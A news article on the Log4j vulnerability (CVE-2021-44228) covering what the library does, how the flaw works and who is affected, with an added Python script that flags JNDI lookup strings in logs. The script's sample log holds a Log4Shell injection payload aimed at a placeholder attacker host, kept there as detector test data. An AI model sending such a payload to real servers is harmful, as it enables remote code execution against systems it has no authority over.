The Log4j bug exposes a bigger issue: Open-source funding


While you were watching the F1 title decider between Max Verstappen and Lewis Hamilton or excited for the Succession finale, companies running the internet were scared shitless.

You might not have noticed it because services like Twitter, Facebook, Gmail, and smaller ones all stayed up. But a bug in an open-source tech called Log4j was (and still is) causing panic amongst the infosec community across the world.

While the bug has affected billions of devices, and companies are scrambling to apply fixes, the open-source community has a raging debate going on about funding volunteers that maintain projects like Log4j.

Before we dive into all that, here’s a brief background about the technology and the issue.

What is Log4j?

Log4j 2 is a Java-based open-source logging framework maintained under the Apache Software Foundation, so anyone can use it for free. Companies use the logging software to track activity on their servers (or even in client-side apps).

For instance, when you visit a website, your IP address, your browser, and the pages you visit are registered by the logger. This data related to activity can help companies solve any problem with their service.

Since the library is Java-based and embedded in so much software, billions of devices running applications built on the framework might be at risk.

What is the Log4j bug?

The bug, listed as CVE-2021-44228 last week, allows attackers to execute code remotely by getting a specially crafted string logged. Since Log4j is so common, cybercriminals can easily get such strings into logs and take control of the server or the client.

One of the main reasons this bug exists is that some versions of Log4j resolve lookup expressions embedded in the text they log, including lookups that reach out to a directory service over LDAP, instead of treating that text as plain data.
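As an added illustration of the defensive side of this (not code from the article), the script below scans log lines for the lookup syntax described above, flagging any entry that contains a JNDI lookup expression. The sample access-log lines are constructed for the example, and "attacker.example" is a placeholder host, not a real indicator.

```python
import re
from typing import List, Tuple

# Log4j lookup expressions have the form ${prefix:value}. The pattern that
# matters for CVE-2021-44228 is a JNDI lookup such as ${jndi:ldap://host/x}.
# The regex matches "${", any text short of a closing brace, then "jndi:",
# so it also catches a jndi lookup nested inside another lookup.
JNDI_LOOKUP = re.compile(r"\$\{[^}]*jndi:", re.IGNORECASE)


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, matched_text, full_line) for each line
    containing a JNDI lookup expression. Line numbers start at 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(line)
        if match:
            hits.append((number, match.group(0), line))
    return hits


# Constructed sample access-log lines (not real traffic). Line 3 contains a
# harmless-looking lookup expression and must not be flagged; line 4 carries
# a JNDI lookup in the User-Agent field and must be.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET /about HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
]


if __name__ == "__main__":
    for number, matched, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: lookup {matched!r} in {line}")
```

The regex deliberately stops at the first closing brace, so an ordinary `${date:yyyy}` style expression is left alone while anything that puts `jndi:` inside a lookup is surfaced for triage. A real deployment would feed this the server's own access, application and authentication logs rather than the embedded sample.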

If you want to read a detailed explanation of the issue in simple language, read this Twitter thread.

Who’s affected?

To be honest, I should’ve named this section “Who’s not affected?” Log4j’s open-source nature and widespread compatibility mean it’s a popular choice, and tons of companies use it — including Apple, Microsoft, Steam, Twitter, Baidu, and Cloudflare.

As soon as the details about the vulnerability were out, several people started scanning servers to check if they were open to exploitation.

Some programmers tested various sites and services to check the potential reach of the attack; you can check out the full list here.